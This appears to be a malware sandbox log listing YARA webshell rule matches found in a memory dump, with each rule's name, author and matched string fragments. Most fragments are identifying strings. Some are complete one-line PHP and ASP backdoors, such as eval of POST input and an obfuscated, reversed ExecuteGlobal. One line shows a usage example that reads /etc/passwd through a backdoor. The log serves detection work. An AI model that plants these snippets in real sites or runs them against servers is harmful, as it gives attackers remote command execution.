00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_c99_locus7s_c99_w4cking_xxx	Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php	Florian Roth	0x1d3512:$s1: $res = @shell_exec($cfe); 0x1d3543:$s8: $res = @ob_get_contents(); 0x1d3575:$s9: @exec($cfe,$res);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_r57shell127_r57_kartal_r57	Web Shell - from files r57shell127.php, r57_kartal.php, r57.php	Florian Roth	0x1db245:$s3: if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } 0x1db2a9:$s5: if (!isset($_SERVER['PHP_AUTH_USER']) \|\| $_SERVER['PHP_AUTH_USER']!==$name \|\| $_
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_con2	Web shells - generated from file con2.asp	Florian Roth	0x1bae03:$s7: ,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_Expdoor_com_ASP	Web shells - generated from file Expdoor.com ASP.asp	Florian Roth	0x1bd271:$s4: ">www.Expdoor.com</a> 0x1bd2ff:$s10: set file=fs.OpenTextFile(server.MapPath(FileName),8,True) ' 0x1bd3ab:$s16: <TITLE>Expdoor.com ASP
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_php2	Web shells - generated from file php2.php	Florian Roth	0x1bb2be:$s0: <?php $s=@$_GET[2];if(md5($s.$s)==
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_bypass_iisuser_p	Web shells - generated from file bypass-iisuser-p.asp	Florian Roth	0x1bb4c7:$s0: <%Eval(Request(chr(112))):Set fso=CreateObject
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_sig_404super	Web shells - generated from file 404super.php	Florian Roth	0x1bd5a2:$s4: $i = pack('c', 0x70, 0x61, 99, 107); 0x1bd5df:$s6: 'h' => $i('H', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'), 0x1bd643:$s7: //http://require.duapp.com/session.php 0x1bd681:$s8: if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);} 0x1bd6e4:$s12: //define('pass','123456'); 0x1bd717:$s13: $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_JSP	Web shells - generated from file JSP.jsp	Florian Roth	0x1bd940:$s1: void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshell_123	Web shells - generated from file webshell-123.php	Florian Roth	0x1bdc2e:$s0: // Web Shell!! 0x1bdce9:$s4: // url:http://www.weigongkai.com/shell/
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_dev_core	Web shells - generated from file dev_core.php	Florian Roth	0x1bdeed:$s1: if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) { 0x1bdf40:$s9: setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30); 0x1be040:$s12: eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C 0x1be095:$s15: if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_pHp	Web shells - generated from file pHp.php	Florian Roth	0x1be2ba:$s0: if(is_readable($path)) antivirus($path.'/',$exs,$matches);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_pppp	Web shells - generated from file pppp.php	Florian Roth	0x1bb6d2:$s0: Mail: chinese@hackermail.com 0x1bb766:$s6: Site: http://blog.weili.me
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_code	Web shells - generated from file code.php	Florian Roth	0x1be702:$s10: if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_xxxx	Web shells - generated from file xxxx.php	Florian Roth	0x1bbb82:$s0: <?php eval($_POST[1]);?>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_PHP1	Web shells - generated from file PHP1.php	Florian Roth	0x1be9d0:$s0: <[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?> 0x1bea2e:$s2: :https://forum.90sec.org/forum.php?mod=viewthread&tid=7316
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_asp1	Web shells - generated from file asp1.asp	Florian Roth	0x1bc1ac:$s0: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave 0x1bc1f7:$s2: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_php6	Web shells - generated from file php6.php	Florian Roth	0x1bc482:$s4: shell.php?qid=zxexp
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_GetPostpHp	Web shells - generated from file GetPostpHp.php	Florian Roth	0x1bc899:$s0: <?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_php5	Web shells - generated from file php5.php	Florian Roth	0x1bcaad:$s0: <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_PHP	Web shells - generated from file PHP.php	Florian Roth	0x1bf06f:$s5: - ExpDoor.com</title>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshells_new_Asp	Web shells - generated from file Asp.asp	Florian Roth	0x1bcd1d:$s2: Function MorfiCoder(Code)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	perlbot_pl	Semi-Auto-generated - file perlbot.pl.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a496f:$s1: #Acesso a Shel - 1 ON 0 OFF
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	php_backdoor_php	Semi-Auto-generated - file php-backdoor.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a4b72:$s0: http://michaeldaw.org 2006 0x1a4b9e:$s1: or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win 0x1a4bf1:$s3: coded by z0mbie
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a6851:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass 0x1a6a21:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass 0x1d3915:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x19dd53:$sAuthor: ShAnKaR 0x19ddca:$sAuthor: ShAnKaR 0x1a6f2d:$sAuthor: ShAnKaR
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Casus15_php_php	Semi-Auto-generated - file Casus15.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a72a1:$s3: value='Calistirmak istediginiz
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	small_php_php	Semi-Auto-generated - file small.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a4dd9:$s1: $pass='abcdef1234567890abcdef1234567890'; 0x1ccff7:$s1: $pass='abcdef1234567890abcdef1234567890'; 0x1a4e1a:$s2: eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1 0x1a4e7a:$s4: @ini_set('error_log',NULL); 0x1ccfc4:$s4: @ini_set('error_log',NULL);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	shellbot_pl	Semi-Auto-generated - file shellbot.pl.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a5072:$s0: ShellBOT 0x1a508a:$s1: PacktsGr0up 0x1a50a5:$s2: CoRpOrAtIoN 0x1a50c0:$s3: # Servidor de irc que vai ser usado
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	fuckphpshell_php	Semi-Auto-generated - file fuckphpshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a74c2:$s1: Don`t be stupid .. this is a priv3 server, so take extra care! 0x1a7511:$s2: \=-- MEMBERS AREA --=/
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ngh_php_php	Semi-Auto-generated - file ngh.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a52e8:$s0: Cr4sh_aka_RKL 0x1a5305:$s1: NGH edition 0x1a5320:$s2: /* connectback-backdoor on perl 0x1a534f:$s3: <form action=<?=$script?>?act=bindshell method=POST>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	jsp_reverse_jsp	Semi-Auto-generated - file jsp-reverse.jsp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a5597:$s0: // backdoor.jsp 0x1a55b6:$s1: JSP Backdoor Reverse Shell 0x1a4b72:$s2: http://michaeldaw.org 0x1a55e0:$s2: http://michaeldaw.org 0x1ab53e:$s2: http://michaeldaw.org
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Tool_asp	Semi-Auto-generated - file Tool.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a57c4:$s0: mailto:rhfactor@antisocial.com 0x1a57f2:$s2: ?raiz=root 0x1a580c:$s3: DIGO CORROMPIDO<BR>CORRUPT CODE
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	NT_Addy_asp	Semi-Auto-generated - file NT Addy.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a5a60:$s0: NTDaddy v1.9 by obzerve of fux0r inc 0x1a5a94:$s2: <ERROR: THIS IS NOT A TEXT FILE> 0x1a5ac4:$s4: RAW D.O.S. COMMAND INTERFACE
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php	Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a7e47:$s0: SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	phvayvv_php_php	Semi-Auto-generated - file phvayvv.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a5f9d:$s1: $baglan=fopen($duzkaydet,'w'); 0x1a5fcb:$s2: PHVayv 1.0
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	rst_sql_php_php	Semi-Auto-generated - file rst_sql.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a644d:$s1: RST MySQL 0x1b22ab:$s1: RST MySQL 0x1a6466:$s2: http://rst.void.ru 0x1b22cd:$s2: http://rst.void.ru 0x1b22f6:$s2: http://rst.void.ru 0x1a6488:$s3: $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	wh_bindshell_py	Semi-Auto-generated - file wh_bindshell.py.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a66c0:$s0: #Use: python wh_bindshell.py [port] [password] 0x1a675b:$s3: #bugz: ctrl+c etc =script stoped=
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	lurm_safemod_on_cgi	Semi-Auto-generated - file lurm_safemod_on.cgi.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a8419:$s0: Network security team :: CGI Shell 0x1a8453:$s1: #########################<<KONEC>>##################################### 0x1a84b2:$s2: ##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	c99madshell_v2_0_php_php	Semi-Auto-generated - file c99madshell_v2.0.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a7768:$s2: eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	w3d_php_php	Semi-Auto-generated - file w3d.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a7bdf:$s0: W3D Shell 0x1a7bf8:$s1: By: Warpboy 0x1a7c13:$s2: No Query Executed
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	WinX_Shell_html	Semi-Auto-generated - file WinX Shell.html.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a8d22:$s0: WinX Shell 0x1a8e62:$s0: WinX Shell 0x1cc994:$s0: WinX Shell 0x1a8e7c:$s1: Created by greenwood from n57
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Dx_php_php	Semi-Auto-generated - file Dx.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a9877:$s2: $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	csh_php_php	Semi-Auto-generated - file csh.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a90b2:$s0: .::[c0derz]::. web-shell 0x1a90da:$s1: http://c0derz.org.ua 0x1a90fe:$s2: vint21h@c0derz.org.ua 0x1a9123:$s3: $name='63a9f0ea7bb98050796b649e85481845';//root
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	pHpINJ_php_php	Semi-Auto-generated - file pHpINJ.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a932d:$s1: News Remote PHP Shell Injection 0x19bf56:$s3: Php Shell <br /> 0x1a935c:$s3: Php Shell <br />
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	sig_2008_php_php	Semi-Auto-generated - file 2008.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a958f:$s0: Codz by angel(4ngel) 0x1a95b3:$s1: Web: http://www.4ngel.net 0x1a95dc:$s2: $admin['cookielife'] = 86400; 0x1a9609:$s3: $errmsg = 'The file you want Downloadable was nonexistent';
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	ak74shell_php_php	Semi-Auto-generated - file ak74shell.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x19d939:$s2: AK-74 Security Team Web Site: www.ak74-team.net 0x1a9b67:$s2: AK-74 Security Team Web Site: www.ak74-team.net 0x1a9b32:$s3: $xshell 0x1a9ba6:$s3: $xshell
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Rem_View_php_php	Semi-Auto-generated - file Rem View.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a9e46:$s4: Welcome to phpRemoteView (RemView)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Java_Shell_js	Semi-Auto-generated - file Java Shell.js.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aa041:$s2: PySystemState.initialize(System.getProperties(), null, argv); 0x1aa096:$s3: public class JythonShell extends JPanel implements Runnable { 0x1aa0eb:$s4: public static int DEFAULT_SCROLLBACK = 100
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	STNC_php_php	Semi-Auto-generated - file STNC.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aa2ec:$s0: drmist.ru 0x19dacb:$s2: STNC WebShell 0x1aa36b:$s2: STNC WebShell 0x1aa388:$s3: http://www.security-teams.net/index.php?showtopic=
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	aZRaiLPhp_v1_0_php	Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aa59d:$s0: azrailphp 0x1aa5b6:$s1: <br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center> 0x1aa60f:$s3: <center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	zacosmall_php	Semi-Auto-generated - file zacosmall.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a05cd:$s0: rand(1,99999);$sj98 0x1a98e0:$s0: rand(1,99999);$sj98 0x1aa828:$s0: rand(1,99999);$sj98 0x1af1ea:$s0: rand(1,99999);$sj98 0x1b1b29:$s0: rand(1,99999);$sj98 0x1aa84b:$s1: $dump_file.='`'.$rows2[0].'`
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	CmdAsp_asp	Semi-Auto-generated - file CmdAsp.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1a25c6:$s0: CmdAsp.asp 0x1aa935:$s0: CmdAsp.asp 0x1aaa70:$s0: CmdAsp.asp 0x1aaae4:$s2: -- Use a poor man's pipe ... a temp file -- 0x1aab1f:$s3: maceo @ dogmile.com
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	simple_backdoor_php	Semi-Auto-generated - file simple-backdoor.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ab4ec:$s0: $cmd = ($_REQUEST['cmd']); 0x1cae02:$s0: $cmd = ($_REQUEST['cmd']); 0x1ab51e:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) --> 0x1ab568:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	mysql_shell_php	Semi-Auto-generated - file mysql_shell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aad0f:$s0: SooMin Kim 0x1b4c0b:$s0: SooMin Kim 0x1aad29:$s1: smkim@popeye.snu.ac.kr
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Dive_Shell_1_0___Emperor_Hacking_Team_php	Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ab7c1:$s0: Emperor Hacking TEAM 0x1ab7e5:$s1: Simshell 0x1acf29:$s1: Simshell 0x1ab805:$s2: ereg('^[[:blank:]]cd[[:blank:]] 0x1acf4f:$s2: ereg('^[[:blank:]]cd[[:blank:]] 0x1b3837:$s2: ereg('^[[:blank:]]cd[[:blank:]] 0x1d6cd0:$s2: ereg('^[[:blank:]]cd[[:blank:]]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Asmodeus_v0_1_pl	Semi-Auto-generated - file Asmodeus v0.1.pl.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aba64:$s0: [url=http://www.governmentsecurity.org 0x1aba9a:$s1: perl asmodeus.pl client 6666 127.0.0.1
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Reader_asp	Semi-Auto-generated - file Reader.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1abd19:$s1: Mehdi & HolyDemon 0x1abd3a:$s2: www.infilak.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	phpshell17_php	Semi-Auto-generated - file phpshell17.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1abfe1:$s1: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	SimShell_1_0___Simorgh_Security_MGZ_php	Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aceff:$s0: Simorgh Security Magazine 0x1acf29:$s1: Simshell.css 0x1acf45:$s2: } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], 0x1acfa1:$s3: www.simorgh-ev.com
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	jspshall_jsp	Semi-Auto-generated - file jspshall.jsp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ac268:$s0: kj021320 0x1ac280:$s1: case 'T':systemTools(out);break;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	rootshell_php	Semi-Auto-generated - file rootshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ad18c:$s0: shells.dl.am 0x1ad1a8:$s1: This server has been infected by $owner 0x1ad22a:$s4: Could not write to file! (Maybe you didn't enter any text?)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	connectback2_pl	Semi-Auto-generated - file connectback2.pl.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ad442:$s0: #We Are: MasterKid, AleXutz, FatMan & MiKuTuL 0x1ad4a2:$s1: echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel 0x1ad502:$s2: ConnectBack Backdoor
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	shells_PHP_wso	Semi-Auto-generated - file wso.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ac74c:$s3: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	backdoor1_php	Semi-Auto-generated - file backdoor1.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ada51:$s2: class backdoor {
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	elmaliseker_asp	Semi-Auto-generated - file elmaliseker.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ae4c9:$s2: dim zombie_array,special_array 0x1ae4f7:$s3: http://vnhacker.org
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	s72_Shell_v1_1_Coding_html	Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ae755:$s1: s72 Shell v1.0 Codinf by Cr@zy_King
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	hidshell_php_php	Semi-Auto-generated - file hidshell.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x199925:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	kacak_asp	Semi-Auto-generated - file kacak.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1adf1f:$s0: Kacak FSO 1.0 0x1adfd3:$s4: mailto:BuqX@hotmail.com
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PHP_Backdoor_Connect_pl_php	Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ae1e8:$s0: LorD of IRAN HACKERS SABOTAGE 0x1ae215:$s1: LorD-C0d3r-NT 0x1ad4a2:$s2: echo --==Userinfo==-- ; 0x1ae232:$s2: echo --==Userinfo==-- ;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Antichat_Socks5_Server_php_php	Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ae9c2:$s0: $port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10); 0x1aea2a:$s3: # [+] Domain name address type 0x1aea5a:$s4: www.antichat.ru
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Antichat_Shell_v1_3_php	Semi-Auto-generated - file Antichat Shell v1.3.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1ae7ee:$s0: Antichat 0x1ae86c:$s0: Antichat 0x1aea9d:$s0: Antichat 0x1aeb0e:$s0: Antichat 0x1aec56:$s0: Antichat 0x1cb0ac:$s0: Antichat 0x1cb111:$s0: Antichat 0x1cb28d:$s0: Antichat 0x1aec6e:$s1: Can't open file, permission denide 0x1a05c4:$s2: $ra44 0x1a05e8:$s2: $ra44 0x1a98d7:$s2: $ra44 0x1a98fb:$s2: $ra44 0x1aeca0:$s2: $ra44 0x1af1e1:$s2: $ra44 0x1af205:$s2: $ra44 0x1b1b20:$s2: $ra44 0x1b1b44:$s2: $ra44
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php	Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1aeebc:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy 0x1d13b6:$s0: Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy 0x1aef10:$s1: Mode Shell v1.0</font></span> 0x1d140d:$s1: Mode Shell v1.0</font></span> 0x1aef3d:$s2: has been already loaded. PHP Emperor <xb5@hotmail.
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	cyberlords_sql_php_php	Semi-Auto-generated - file cyberlords_sql.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b006c:$s0: Coded by n0 [nZer0] 0x1b008f:$s1: www.cyberlords.net 0x1b00b2:$s2: U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html	Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xfd624:$s0: Ayyildiz 0x1b045b:$s0: Ayyildiz 0x1b04dd:$s0: Ayyildiz 0x1b0636:$s0: Ayyildiz 0x1b064e:$s1: TouCh By iJOo 0x1b066b:$s2: First we check if there has been asked for a working directory 0x1b06b9:$s3: http://ayyildiz.org/images/whosonline2.gif
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EFSO_2_asp	Semi-Auto-generated - file EFSO_2.asp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1af8fc:$s0: Ejder was HERE 0x1af91a:$s1: ~PU&BP[_)f!8c2F@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&~,jcW~~[_c3TRFFzq@#@&PP,~~
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	lamashell_php	Semi-Auto-generated - file lamashell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x19d69c:$s0: lama's'hell 0x1afb43:$s0: lama's'hell
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Ajax_PHP_Command_Shell_php	Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b08d6:$s1: newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br> 0x1b097f:$s3: newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JspWebshell_1_2_jsp	Semi-Auto-generated - file JspWebshell 1.2.jsp.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x19c70a:$s0: JspWebshell 0x19c77c:$s0: JspWebshell 0x19ed12:$s0: JspWebshell 0x19ed86:$s0: JspWebshell 0x1b0a03:$s0: JspWebshell 0x1b0a70:$s0: JspWebshell 0x1b0bb4:$s0: JspWebshell 0x1d75fd:$s0: JspWebshell 0x1d7685:$s0: JspWebshell 0x19c8d1:$s1: CreateAndDeleteFolder is error: 0x19eedb:$s1: CreateAndDeleteFolder is error: 0x1b0bcf:$s1: CreateAndDeleteFolder is error:
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Sincap_php_php	Semi-Auto-generated - file Sincap.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b0e7b:$s2: $tampon4=$tampon3-1 0x19a9cd:$s3: @aventgrup.net 0x1b0e9e:$s3: @aventgrup.net
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Phyton_Shell_py	Semi-Auto-generated - file Phyton Shell.py.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1b1829:$s2: # d00r.py 0.3a (reverse\|bind)-shell in python by fQ
